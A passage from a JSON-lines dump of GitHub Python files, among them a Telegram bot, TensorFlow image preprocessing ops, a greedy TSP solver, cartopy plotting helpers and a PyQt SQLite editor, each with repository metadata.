[]\n count_list_ChoiceDTO = 1\n for b in Choice.objects.filter(Question = a):\n list_ChoiceDTO.append(ChoiceDTO(uuid = str(count_list_ChoiceDTO),\n text = b.text,\n is_correct=b.is_correct))\n count_list_ChoiceDTO += 1\n list_QuestionDTO.append(QuestionDTO(uuid = str(a.uuid),\n text = a.text,\n choices = list_ChoiceDTO))\n return list_QuestionDTO\n quiz = QuizResultService(QuizDTO(\n uuid = \"1\",\n title = \"Тест по теме язык python\",\n questions = question()),\n AnswersDTO(\n quiz_uuid = \"1\",\n answers = answer(),\n ))\n\n return render(request, \"finish.html\", {\n \"result\": str(quiz.get_result()),\n })","repo_name":"severmen/simbirsoft_test-task","sub_path":"quiz_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22969137369","text":"from big_vision.pp import utils\nfrom big_vision.pp.registry import Registry\nimport numpy as np\nimport tensorflow as tf\n\n\n@Registry.register(\"preprocess_ops.rgb_to_grayscale_to_rgb\")\n@utils.InKeyOutKey(indefault=\"image\", outdefault=\"image\")\ndef get_rgb_to_grayscale_to_rgb():\n def _rgb_to_grayscale_to_rgb(image):\n return tf.image.grayscale_to_rgb(tf.image.rgb_to_grayscale(image))\n return _rgb_to_grayscale_to_rgb\n\n\n@Registry.register(\"preprocess_ops.nyu_eval_crop\")\ndef get_nyu_eval_crop():\n \"\"\"Crops labels and image to valid eval area.\"\"\"\n # crop_h = slice(45, 471)\n # crop_w = slice(41, 601)\n crop_h_start = 54\n crop_h_size = 426\n crop_w_start = 41\n crop_w_size = 560\n\n def _pp(data):\n tf.debugging.assert_equal(tf.shape(data[\"labels\"]), (480, 640, 1))\n tf.debugging.assert_equal(tf.shape(data[\"image\"]), (480, 640, 3))\n data[\"labels\"] = tf.slice(data[\"labels\"],\n [crop_h_start, crop_w_start, 0],\n [crop_h_size, crop_w_size, -1])\n data[\"image\"] = tf.slice(data[\"image\"],\n [crop_h_start, crop_w_start, 0],\n [crop_h_size, crop_w_size, -1])\n return data\n return _pp\n\n\n@Registry.register(\"preprocess_ops.nyu_depth\")\n@utils.InKeyOutKey(indefault=\"depth\", outdefault=\"labels\")\ndef 
get_nyu_depth():\n \"\"\"Preprocesses NYU depth data.\"\"\"\n def _pp(depth):\n return tf.expand_dims(tf.cast(depth, tf.float32), -1)\n return _pp\n\n\n@Registry.register(\"preprocess_ops.coco_panoptic\")\ndef get_coco_panoptic_pp():\n \"\"\"COCO-panoptic: produces a mask with labels and a mask with instance ids.\n\n Instance channel will have values between 1 and N, and -1 for non-annotated\n pixels.\n\n Returns:\n COCO panoptic preprocessign op.\n \"\"\"\n def _coco_panoptic(data):\n instance_ids = tf.cast(data[\"panoptic_objects\"][\"id\"], tf.int32)\n instance_labels = tf.cast(data[\"panoptic_objects\"][\"label\"], tf.int32)\n\n # Convert image with ids split in 3 channels into a an integer id.\n id_mask = tf.einsum(\n \"hwc,c->hw\",\n tf.cast(data[\"panoptic_image\"], tf.int32),\n tf.constant([1, 256, 256**2], tf.int32))\n\n # Broadcast into N boolean masks one per instance_id.\n n_masks = tf.cast(\n id_mask[:, :, None] == instance_ids[None, None, :], tf.int32)\n\n # Merge into a semantic and an instance id mask.\n # Note: pixels which do not belong to any mask, will have value=-1\n # which creates an empty one_hot masks.\n # Number instances starting at 1 (0 is treated specially by make_canonical).\n instance_idx = tf.range(tf.shape(instance_ids)[-1])\n instances = tf.einsum(\"hwc,c->hw\", n_masks, instance_idx + 1)\n semantics = tf.einsum(\"hwc,c->hw\", n_masks, instance_labels + 1)\n\n data[\"instances\"] = instances[:, :, None]\n data[\"semantics\"] = semantics[:, :, None]\n return data\n\n return _coco_panoptic\n\n\n@Registry.register(\"preprocess_ops.make_canonical\")\n@utils.InKeyOutKey(indefault=\"labels\", outdefault=\"labels\")\ndef get_make_canonical(random=False, main_sort_axis=\"y\"):\n \"\"\"Makes id mask ordered from left to right based on the center of mass.\"\"\"\n # By convention, instances are in the last channel.\n def _make_canonical(image):\n \"\"\"Op.\"\"\"\n instimg = image[..., -1]\n\n # Compute binary instance masks. Note, we do not touch 0 and neg. ids.\n ids = tf.unique(tf.reshape(instimg, [-1])).y\n ids = ids[ids > 0]\n n_masks = tf.cast(\n instimg[None, :, :] == ids[:, None, None], tf.int32)\n\n if not random:\n f = lambda x: tf.reduce_mean(tf.cast(tf.where(x), tf.float32), axis=0)\n centers = tf.map_fn(f, tf.cast(n_masks, tf.int64), dtype=tf.float32)\n centers = tf.reshape(centers, (tf.shape(centers)[0], 2))\n major = {\"y\": 0, \"x\": 1}[main_sort_axis]\n perm = tf.argsort(\n centers[:, 1 - major] +\n tf.cast(tf.shape(instimg)[major], tf.float32) * centers[:, major])\n n_masks = tf.gather(n_masks, perm)\n else:\n n_masks = tf.random.shuffle(n_masks)\n\n idx = tf.range(tf.shape(ids)[0])\n can_mask = tf.einsum(\"chw,c->hw\", n_masks, idx + 2) - 1\n # Now, all 0 and neg. ids have collapsed to -1. 
Thus, we recover 0 id from\n # the original mask.\n can_mask = tf.where(instimg == 0, 0, can_mask)\n return tf.concat([image[..., :-1], can_mask[..., None]], axis=-1)\n\n return _make_canonical\n\n\n@Registry.register(\"preprocess_ops.inception_box\")\ndef get_inception_box(\n *, area=(0.05, 1.0), aspect=(0.75, 1.33), min_obj_cover=0.0,\n outkey=\"box\", inkey=\"image\"):\n \"\"\"Creates an inception style bounding box which can be used to crop.\"\"\"\n def _inception_box(data):\n _, _, box = tf.image.sample_distorted_bounding_box(\n tf.shape(data[inkey]),\n area_range=area,\n aspect_ratio_range=aspect,\n min_object_covered=min_obj_cover,\n bounding_boxes=(data[\"objects\"][\"bbox\"][None, :, :]\n if min_obj_cover else tf.zeros([0, 0, 4])),\n use_image_if_no_bounding_boxes=True)\n # bbox is [[[y0,x0,y1,x1]]]\n data[outkey] = (box[0, 0, :2], box[0, 0, 2:] - box[0, 0, :2])\n return data\n return _inception_box\n\n\n@Registry.register(\"preprocess_ops.crop_box\")\n@utils.InKeyOutKey(with_data=True)\ndef get_crop_box(*, boxkey=\"box\"):\n \"\"\"Crops an image according to bounding box in `boxkey`.\"\"\"\n def _crop_box(image, data):\n shape = tf.shape(image)[:-1]\n begin, size = data[boxkey]\n begin = tf.cast(begin * tf.cast(shape, tf.float32), tf.int32)\n size = tf.cast(size * tf.cast(shape, tf.float32), tf.int32)\n begin = tf.concat([begin, tf.constant((0,))], axis=0)\n size = tf.concat([size, tf.constant((-1,))], axis=0)\n crop = tf.slice(image, begin, size)\n # Unfortunately, the above operation loses the depth-dimension. So we need\n # to restore it the manual way.\n crop.set_shape([None, None, image.shape[-1]])\n return crop\n return _crop_box\n\n\n@Registry.register(\"preprocess_ops.randu\")\ndef get_randu(key):\n \"\"\"Creates a random uniform float [0, 1) in `key`.\"\"\"\n def _randu(data):\n data[key] = tf.random.uniform([])\n return data\n return _randu\n\n\n@Registry.register(\"preprocess_ops.det_fliplr\")\n@utils.InKeyOutKey(with_data=True)\ndef get_det_fliplr(*, randkey=\"fliplr\"):\n \"\"\"Flips an image horizontally based on `randkey`.\"\"\"\n # NOTE: we could unify this with regular flip when randkey=None.\n def _det_fliplr(orig_image, data):\n flip_image = tf.image.flip_left_right(orig_image)\n flip = tf.cast(data[randkey] > 0.5, orig_image.dtype)\n return flip_image * flip + orig_image * (1 - flip)\n return _det_fliplr\n\n\n@Registry.register(\"preprocess_ops.strong_hash\")\n@utils.InKeyOutKey(indefault=\"tfds_id\", outdefault=\"tfds_id\")\ndef get_strong_hash():\n \"\"\"Preprocessing that hashes a string.\"\"\"\n def _strong_hash(string):\n return tf.strings.to_hash_bucket_strong(\n string,\n np.iinfo(int).max, [3714561454027272724, 8800639020734831960])\n return _strong_hash\n","repo_name":"google-research/big_vision","sub_path":"big_vision/pp/proj/uvim/pp_ops.py","file_name":"pp_ops.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"77"} +{"seq_id":"15546991541","text":"finEntrada = False\nnombres = []\n\ndef licitacion(*nombres, equipo):\n print(\"equipo \" + equipo + \" :\")\n if(len(*nombres)==0):\n print(\"sin Jugadores\")\n else:\n for c in nombres:\n print(\"\\t\" + str(c))\n\nwhile(finEntrada == False):\n print(\"Escriba 0 si ya no desea incorporar mas jugadores\")\n if(input()=='0'):\n finEntrada =True\n break\n print(\"introduzca un miembro y pulse enter\")\n nombres.append(input())\n\n\n\n\nlicitacion(nombres, 
equipo=\"buff\")\n","repo_name":"paulatw20/PythonSh","sub_path":"Funciones/funciones2.py","file_name":"funciones2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19066722038","text":"#!/usr/bin/env python\n\n\"\"\"\nCV2 video capture example from Pure Thermal 1\n\"\"\"\n\ntry:\n import cv2\nexcept ImportError:\n print(\"ERROR python-opencv must be installed\")\n exit(1)\n\nclass OpenCvCapture(object):\n \"\"\"\n Encapsulate state for capture from Pure Thermal 1 with OpenCV\n \"\"\"\n\n def __init__(self):\n cv2_cap = cv2.VideoCapture(0)\n if cv2_cap.isOpened():\n print(\"Thermal Camera Found\")\n if not cv2_cap.isOpened():\n print(\"Thermal Camera not found!\")\n exit(1)\n\n self.cv2_cap = cv2_cap\n\n def show_video(self):\n \"\"\"\n Run loop for cv2 capture from lepton\n \"\"\"\n cv2.namedWindow(\"lepton\", cv2.WINDOW_NORMAL)\n print(\"Running, ESC or Ctrl-c to exit...\")\n while True:\n ret, img = self.cv2_cap.read()\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #_, binary = cv2.threshold(img, 88, 255, cv2.THRESH_BINARY)\n #im3 = cv2.bitwise_and(img, binary)\n #im3[binary == 0] = 0\n blur = cv2.GaussianBlur(img, (5,5),cv2.BORDER_DEFAULT)\n canny = cv2.Canny(blur, 10, 50)\n contours = cv2.findContours(canny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[0]\n cnt = contours[4]\n cv2.drawContours()\n\n if ret == False:\n print(\"Error reading image\")\n break\n\n cv2.imshow(\"lepton\", cv2.resize(img, (640, 480)))\n if cv2.waitKey(5) == 27:\n break\n\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n OpenCvCapture().show_video()\n","repo_name":"maykef/DIY_Fluorometer","sub_path":"archive/opencv_capture_thermal.py","file_name":"opencv_capture_thermal.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14804153419","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Oct 22, 2017\n\n@author: Administrator\n'''\n\nimport telebot\nimport config\nimport csv\nimport time\nimport datetime\nimport logging\n\n# bot plugins\nimport start\n# import temperature\nimport audio\nimport sotd_song\n# import cotd_plugin\nimport announce\nimport roll\nimport webcomics\nimport slap_plugin\nimport likezor_plugin\nimport btc_plugin\nimport yankovic_plugin\nimport rip_plugin\nimport mini_project_number_guess\nimport mini_project_magic_ball\nimport mini_project_hangman\n\ncommands = { # command description used in the \"help\" command\n 'start': 'Get used to the bot',\n 'help': 'Gives you information about the available commands',\n # 'temperature': 'Shows current temperature in my kitchen',\n 'guess': 'Числовая угадайка',\n 'ball': 'Магический шар',\n 'hangman': 'Игра в Виселицу',\n 'song': 'A random song from the database',\n 'song [username] ': 'A list of songs submitted by [username], i.e. /song username 3',\n 'sotd': 'Links a song of the day',\n # 'cotd': 'Cartoon of the day',\n 'smbc': 'Recent Saturday Morning Breakfast Cereal (SMBC)',\n 'xkcd': 'Recent XKCD',\n 'phd': 'Recent PhD comic',\n 'dilbert': 'Recent Dilbert by Scott Adams',\n 'dino': 'Recent Dinosaur Comic',\n 'calvin': 'Random Calvin and Hobbes by Bill Watterson',\n 'announce': 'Check daily announcements',\n 'slap [target]': 'Slap somebody',\n 'roll [nDr]': 'Roll a dice in nDr format, i.e. 
/roll 3d8',\n 'btc [delta]': 'Average USD market price historical chart across major bitcoin exchanges over delta, which can be either day or week or month or year, i.e. /btc week or just /btc to get current price',\n 'weirdal': 'Random Weird Al Yankovic music video.',\n 'rip [youtube url] ': 'Rip an .mp3 file from youtube and optionally add it to database',\n 'likezor [download] ': 'Download likes of a Twitter user, i.e. /likezor download gaestlic'\n}\n\n\n# Keyboard = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n# Keyboard.add('')\n# hideKeyboard = types.ReplyKeyboardRemove() # if sent as reply_markup, will hide the keyboard\n\n# logger = telebot.logger\n# telebot.logger.setLevel(logging.DEBUG) # Outputs debug messages to console\n\n\n# telebot.apihelper.proxy = {\n# 'https':'socks5://{}:{}'.format(config.ip,config.port)\n# }\n\ndef listener(messages):\n \"\"\"\n When new messages arrive TeleBot will call this function.\n \"\"\"\n for message in messages:\n if message.content_type == 'text':\n # print the sent message to the console\n if message.chat.type == 'private':\n if message.chat.username:\n print(message.chat.username + \" [\" + str(message.chat.id) + \"]: \" + message.text)\n else:\n print(message.chat.first_name + \" [\" + str(message.chat.id) + \"]: \" + message.text)\n else:\n print(message.chat.title + \" [\" + str(message.chat.id) + \"]: \" + message.text)\n\n\nbot = telebot.TeleBot(config.token)\nbot.remove_webhook()\nbot.set_update_listener(listener) # register listener\n\n\n# handle the \"/start\" command\n@bot.message_handler(commands=['start'])\ndef handle_start_help(message):\n start.handle_start_help(bot, message)\n\n\n# help page\n@bot.message_handler(commands=['help'])\ndef command_help(message):\n help_text = \"The following commands are available: \\n\"\n for key in commands: # generate help text out of the commands dictionary defined at the top\n help_text += \"/\" + key + \": \"\n help_text += commands[key] + \"\\n\"\n bot.send_message(message.chat.id, help_text) # send the generated help page\n\n\n# @bot.message_handler(commands=['temperature'])\n# @bot.message_handler(func=lambda message: message.text == 'Temperature')\n# def handle_temperature(message):\n# temperature.handle_temperature(bot, message)\n\nfrom slippy_bot import bot\n\n\n@bot.message_handler(content_types=['audio'])\ndef handle_drop_audio(message):\n audio.handle_drop_audio(bot, message)\n\n\n@bot.message_handler(func=lambda message: message.text == 'SOTD')\n@bot.message_handler(commands=['sotd'])\ndef sotd(message):\n sotd_song.sotd(bot, message)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Song')\n@bot.message_handler(commands=['song'])\ndef song(message):\n sotd_song.song(bot, message)\n\n\n# @bot.message_handler(commands=['cotd'])\n# def cotd(message):\n# cotd_plugin.handle_cotd(bot, message)\n\n\n@bot.message_handler(commands=['announce'])\ndef announce_command(message):\n announce.announce_command(bot, message)\n\n\n@bot.message_handler(commands=['roll'])\ndef dice(message):\n roll.dice(bot, message)\n\n\n@bot.message_handler(commands=['smbc'])\ndef smbc(message):\n webcomics.smbc(bot, message)\n\n\n@bot.message_handler(commands=['calvin'])\ndef calvin(message):\n webcomics.calvin(bot, message)\n\n\n@bot.message_handler(commands=['xkcd'])\ndef xkcd(message):\n webcomics.xkcd(bot, message)\n\n\n@bot.message_handler(commands=['dilbert'])\ndef dilbert(message):\n webcomics.dilbert(bot, message)\n\n\n@bot.message_handler(commands=['phd'])\ndef 
phd(message):\n webcomics.phd(bot, message)\n\n\n@bot.message_handler(commands=['dino'])\ndef dino(message):\n webcomics.dinosaur(bot, message)\n\n\n@bot.message_handler(commands=['slap'])\ndef slap(message):\n slap_plugin.slap(bot, message)\n\n\n@bot.message_handler(commands=['likezor'])\ndef likezor(message):\n likezor_plugin.likezor(bot, message)\n\n\n@bot.message_handler(commands=['btc'])\ndef btc(message):\n btc_plugin.btc(bot, message)\n\n\n@bot.message_handler(commands=['weirdal'])\n# http://pantuts.com/2013/02/16/youparse-extract-urls-from-youtube/\ndef yankovic(message):\n yankovic_plugin.yankovic(bot, message)\n\n\n@bot.message_handler(commands=['rip'])\n# https://stackoverflow.com/questions/27473526/download-only-audio-from-youtube-video-using-youtube-dl-in-python-script \ndef rip(message):\n rip_plugin.rip(bot, message)\n\n\n@bot.message_handler(commands=['guess'])\ndef guess(message):\n mini_project_number_guess.guess(bot, message)\n\n\n@bot.message_handler(commands=['ball'])\ndef ball(message):\n mini_project_magic_ball.ball(bot, message)\n\n\n@bot.message_handler(commands=['hangman'])\ndef hangman(message):\n mini_project_hangman.play_hangman(bot, message)\n\n\n@bot.message_handler(content_types=['document'])\ndef handle_docs_audio(message):\n # bot.reply_to(message, \"Sorry, I don't work with documents.\")\n pass\n\n\n# default handler for every other text\n@bot.message_handler(func=lambda message: True, content_types=['text'])\ndef command_default(m):\n # this is the standard reply to a normal message\n # bot.send_message(m.chat.id, \"I don't understand \\\"\" + m.text + \"\\\"\\nMaybe try the help page at /help\")\n pass\n\n\n@bot.message_handler(func=lambda msg: msg.text == u'\\U0001F4A9')\ndef set_ro(message):\n bot.send_message(message.chat.id, \"Sorry, no shit posting.\", reply_to_message_id=message.message_id)\n bot.restrict_chat_member(message.chat.id, message.from_user.id, until_date=time.time() + 31)\n\n\ndef telegram_polling():\n \"\"\"\n https://github.com/eternnoir/pyTelegramBotAPI/issues/206\n https://github.com/eternnoir/pyTelegramBotAPI/issues/401\n \"\"\"\n try:\n bot.polling(none_stop=True, timeout=100) # constantly get messages from Telegram\n except Exception as err:\n logging.error(err)\n bot.stop_polling()\n print(\"Internet error!\")\n time.sleep(10)\n telegram_polling()\n\n\nif __name__ == '__main__':\n telegram_polling()\n","repo_name":"a-maksimov/Sleepy_bot","sub_path":"slippy_bot.py","file_name":"slippy_bot.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25051547021","text":"import numpy as np\nfrom math import sqrt\n\n\ndef calc_dist(x1: float, y1: float, x2: float, y2: float):\n return sqrt((x1-x2)**2 + (y1-y2)**2)\n\n\n# def find_min(ind, data): # to zakomentowane to raczej zle xD\n# for index in range(len(data)):\n# if not np.array_equal(data[ind], data[index]):\n# tmp_min = calc_dist(data[ind][0], data[ind][1], data[index][0], data[index][1])\n# tmp_index = index\n# break\n# for index in range(len(data)):\n# next_min = calc_dist(data[ind][0], data[ind][1], data[index][0], data[index][1])\n# if next_min < tmp_min and next_min != 0:\n# tmp_min = next_min\n# tmp_index = index\n# return tmp_min, tmp_index\n#\n#\n# def main(data):\n# dist = 0\n# current_pos = 0\n# while len(data) > 1:\n# to_add, current_pos = find_min(current_pos, data)\n# dist += to_add\n# data = np.delete(data, current_pos, axis=0)\n# return dist\ndef find_min(curr_pnt, 
data, vis):\n for index in range(len(data)):\n if not np.array_equal(data[curr_pnt], data[index]) and index not in vis:\n tmp_min = calc_dist(data[curr_pnt][0], data[curr_pnt][1], data[index][0], data[index][1])\n tmp_index = index\n break\n for index in range(len(data)):\n next_min = calc_dist(data[curr_pnt][0], data[curr_pnt][1], data[index][0], data[index][1])\n if index not in vis and tmp_min > next_min > 0:\n tmp_min = next_min\n tmp_index = index\n return tmp_min, tmp_index\n\n\ndef main(data):\n pos = 0\n dist = 0\n vis = set()\n vis.add(pos)\n path = [pos+1]\n coordinates = [data[pos]]\n while len(vis) < len(data):\n to_add, pos = find_min(pos, data, vis)\n dist += to_add\n vis.add(pos)\n path.append(pos+1)\n coordinates.append(data[pos])\n dist += calc_dist(data[0][0], data[0][1], data[pos][0], data[pos][1])\n path.append(path[0])\n coordinates.append(data[0])\n coordinates = np.array(coordinates)\n coordinates = np.transpose(coordinates)\n return dist, path, coordinates\n\n\nif __name__ == \"__main__\":\n cities = np.array([[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]], dtype=np.float32)\n print(main(cities))\n","repo_name":"justdodo27/TSP-python","sub_path":"greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28034869930","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nODell_udf.py\n python script of functions written by me or by others passed on to me\nCreated on Wed Sep 8 09:09:22 2021\n@author: kodell\n\"\"\"\n#%% packages needed\nimport numpy as np\nimport cartopy.feature as cfeature\nimport cartopy.crs as ccrs\nimport cartopy.io.shapereader as shpreader\nimport matplotlib.pyplot as plt\nimport matplotlib as mplt\nfrom matplotlib import colors\nmplt.rcParams['font.size'] = '14'\nmplt.rcParams['font.family'] = 'sans-serif'\n#mplt.rcParams['font.sans-serif'] = 'Veranda'\n#%% make a basic map of the US using cartopy, written by Katelyn O'Dell\n# NOTE this assumes a PlateCaree projection\ndef plt_map(dlon,dlat,data,cmap,clabel,title,**kwargs):\n vlim = kwargs.get('clim', None)\n outpath = kwargs.get('outname',None)\n vpts = kwargs.get('cpts',None)\n multi = kwargs.get('multi',None)\n if multi:\n nd = len(data)\n fig, axarr = plt.subplots(nrows=multi[0],ncols=multi[1],subplot_kw={'projection': ccrs.PlateCarree()},\n figsize=(11,8.5))\n axarr = axarr.flatten()\n for di in range(nd):\n ax = axarr[di]\n ax.patch.set_visible(False)\n # plot shapfile with colors\n ax.add_feature(cfeature.LAND.with_scale('50m'),facecolor='gray',alpha=0.5)\n ax.add_feature(cfeature.OCEAN.with_scale('50m'))\n ax.add_feature(cfeature.STATES.with_scale('50m'),edgecolor='lightgray')\n ax.outline_patch.set_edgecolor('white')\n if vlim:\n cs = ax.scatter(dlon,dlat,c=data[di],s=1,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap[di],vmin=vlim[di][0],vmax=vlim[di][1])\n elif vpts:\n divnorm=colors.TwoSlopeNorm(vmin=vpts[di][0], vcenter=vpts[di][1], vmax=vpts[di][2])\n cs = ax.scatter(dlon,dlat,c=data[di],s=1,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap[di],norm=divnorm)\n else:\n cs = ax.scatter(dlon,dlat,c=data[di],s=1,#shading='nearest',\n transform=ccrs.PlateCarree(),cmap=cmap[di])\n cbar = fig.colorbar(cs,ax=ax,orientation='horizontal',pad=0,shrink=0.6)\n #cbar = fig.colorbar(cs,ax=ax,orientation='vertical',pad=0,shrink=0.5)\n cbar.set_label(label=clabel[di],size=16)\n ax.set_title(title[di],fontsize=18)\n plt.tight_layout()\n else: \n 
fig, ax = plt.subplots(nrows=1,ncols=1,\n                               subplot_kw={'projection': ccrs.PlateCarree()},\n                               figsize=(11,8.5))\n        ax.patch.set_visible(False)\n        # plot shapefile with colors\n        ax.add_feature(cfeature.LAND.with_scale('50m'),facecolor='gray',alpha=0.5)\n        ax.add_feature(cfeature.OCEAN.with_scale('50m'))\n        ax.add_feature(cfeature.STATES.with_scale('50m'),edgecolor='lightgray')\n        ax.outline_patch.set_edgecolor('white')\n        if vlim:\n            cs = ax.scatter(dlon,dlat,c=data,s=10,#shading='nearest',\n                            transform=ccrs.PlateCarree(),cmap=cmap,vmin=vlim[0],vmax=vlim[1])\n        elif vpts:\n            divnorm=colors.TwoSlopeNorm(vmin=vpts[0], vcenter=vpts[1], vmax=vpts[2])\n            cs = ax.scatter(dlon,dlat,c=data,s=10,#shading='nearest',\n                            transform=ccrs.PlateCarree(),cmap=cmap,norm=divnorm)\n        else:\n            cs = ax.scatter(dlon,dlat,c=data,s=10,#shading='nearest',\n                            transform=ccrs.PlateCarree(),cmap=cmap)\n        #cbar = fig.colorbar(cs,ax=ax,orientation='vertical',pad=0,shrink=0.7)\n        cbar = fig.colorbar(cs,ax=ax,orientation='vertical',pad=0,shrink=0.5)\n        cbar.set_label(label=clabel,size=16)\n        ax.set_title(title,fontsize=18)\n        plt.tight_layout()\n\n    if outpath:\n        plt.savefig(outpath)\n    plt.show()\n
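\n# Hypothetical usage sketch (argument names and values here are assumed, not part of the original script):\n# plt_map(grid_lon, grid_lat, pm_data, 'viridis', 'PM2.5 [ug/m3]', 'Smoke PM', clim=[0, 50], outname='smoke_pm.png')\n# For a multi-panel figure, data/cmap/clabel/title become per-panel lists and multi gives the grid shape:\n# plt_map(grid_lon, grid_lat, [d1, d2, d3, d4], ['viridis']*4, ['ug/m3']*4, ['a', 'b', 'c', 'd'], multi=[2, 2])\n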
","repo_name":"kaodell/Sandberg_CDC_smokePM","sub_path":"ODell_udf_CDCprj.py","file_name":"ODell_udf_CDCprj.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44945272592","text":"# Import the required libraries\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtSql import *\nimport mainwindow_ui as ui\n\n# Main window class\n# Inherits from the QMainWindow base class\nclass MainWindow(QMainWindow):\n\t# Constructor\n\tdef __init__(self):\n\t\t# Call the base class constructor\n\t\tsuper(MainWindow, self).__init__()\n\t\t# Create an instance of the window class from the ui file\n\t\tself.ui = ui.Ui_MainWindow()\n\t\t# Set the window up on the current form\n\t\tself.ui.setupUi(self)\n\t\t# The database handle is empty by default\n\t\tself.db = None\n\t\t# List for the ids of removed items\n\t\tself.remove = []\n\t\t# List for user ids\n\t\tself.userId = []\n\n\t\n\t# Initialize the database connection into a local variable\n\t# dbName - path to the database file\n\t# Returns True if everything is OK\n\tdef prepareDatabase(self, dbName):\n\t\tself.db = QSqlDatabase.addDatabase('QSQLITE', 'db')\n\t\tself.db.setDatabaseName(dbName)\n\t\t\n\t\tif not self.db.open():\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not connect to the database:\\n' + self.db.lastError().text())\n\t\t\treturn False\n\t\treturn True\n\t\n\t# Populate the list of database tables manually\n\tdef showTables(self):\n\t\tfor i in range(3):\n\t\t\tself.ui.tableWidget.removeRow(i)\n\t\t\tself.ui.tableWidget.insertRow(i)\n\t\tusers = QTableWidgetItem('Users')\n\t\tusers.setData(Qt.UserRole, ['users', True])\n\t\tself.ui.tableWidget.setItem(0,0,users)\n\t\tusers.setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\n\t\tgroups = QTableWidgetItem('Groups')\n\t\tgroups.setData(Qt.UserRole, ['groups', True])\n\t\tself.ui.tableWidget.setItem(1,0,groups)\n\t\tgroups.setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\n\t\tuserGroups = QTableWidgetItem('Users-groups')\n\t\tuserGroups.setData(Qt.UserRole, ['user_groups', False])\n\t\tself.ui.tableWidget.setItem(2,0,userGroups)\n\t\tuserGroups.setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\n\t# Create-database button handler\n\t@pyqtSlot()\n\tdef on_actionCreateDB_triggered(self):\n\t\tname = QFileDialog.getSaveFileName(self, 'Choose a database file to create','', 'SQLite database (*.sqlite)')[0]\n\t\tif not name:\n\t\t\treturn\n\t\tif not self.prepareDatabase(name):\n\t\t\treturn\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\t\n\t\tqStr = ['''CREATE TABLE users(\n\t\t\tid INTEGER PRIMARY KEY AUTOINCREMENT,\n\t\t\tname VARCHAR,\n\t\t\tpassword VARCHAR\n\t\t)''',\n\t\t\n\t\t'''CREATE TABLE groups (\n\t\t\tid INTEGER PRIMARY KEY AUTOINCREMENT,\n\t\t\tname VARCHAR\n\t\t);''',\n\t\t\n\t\t'''CREATE TABLE user_groups(\n\t\t\tuser_id INTEGER CONSTRAINT user_id_fk REFERENCES users(id) ON DELETE CASCADE,\n\t\t\tgroup_id INTEGER CONSTRAINT group_id_fk REFERENCES groups(id) ON DELETE CASCADE\n\t\t);\n\t\t''']\n\t\t\n\t\tfor stmt in qStr:\n\t\t\tif not query.exec(stmt):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not create the database:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\t\n\t\tself.showTables()\n\t\t\n\t# Open-database button handler\n\t@pyqtSlot()\n\tdef on_actionOpenDB_triggered(self):\n\t\tname = QFileDialog.getOpenFileName(self, 'Choose a database file','', 'SQLite database (*.sqlite)')[0]\n\t\tif not name:\n\t\t\treturn\n\t\tif not self.prepareDatabase(name):\n\t\t\treturn\n\t\tself.showTables()\n\t\t\n\t# Add-record button handler\n\t@pyqtSlot()\n\tdef on_actionAdd_triggered(self):\t\n\t\tlastStr = self.ui.twSimple.rowCount()\n\t\tself.ui.twSimple.insertRow(lastStr)\n\t\tself.ui.twSimple.setItem(lastStr, 0, QTableWidgetItem(''))\n\t\tself.ui.twSimple.item(lastStr, 0).setData(Qt.UserRole, 0)\n\n\t\t\n\t# Delete-record button handler\n\t@pyqtSlot()\n\tdef on_actionDelete_triggered(self):\n\t\tif self.ui.twSimple.currentRow() >= 0:\n\t\t\titem = self.ui.twSimple.currentRow()\n\t\t\tidC = self.ui.twSimple.item(item, 0).data(Qt.UserRole)\n\t\t\tif idC != 0:\n\t\t\t\tself.remove.append(idC)\n\t\t\tself.ui.twSimple.removeRow(item)\n\n\t# Save button handler\n\t@pyqtSlot()\n\tdef on_actionSave_triggered(self):\n\t\tif self.ui.tableWidget.currentRow() == 0 or self.ui.tableWidget.currentRow() == 1:\n\t\t\tif self.ui.tableWidget.currentRow() == 0:\n\t\t\t\tself.deleteFromTable(\"users\")\n\t\t\tif self.ui.tableWidget.currentRow() == 1:\n\t\t\t\tself.deleteFromTable(\"groups\")\n\t\t\tself.updateTable()\n\t\tif self.ui.tableWidget.currentRow() == 2:\n\t\t\tself.removeFromTable()\n\t\t\tself.insertToTableUserGroups()\n\t\tQMessageBox.information(self, 'Success', 'Saved')\n\t# Remove items from the users-groups table\n\tdef removeFromTable(self):\n\t\tquery = QSqlQuery(self.db)\n\t\tfor c in 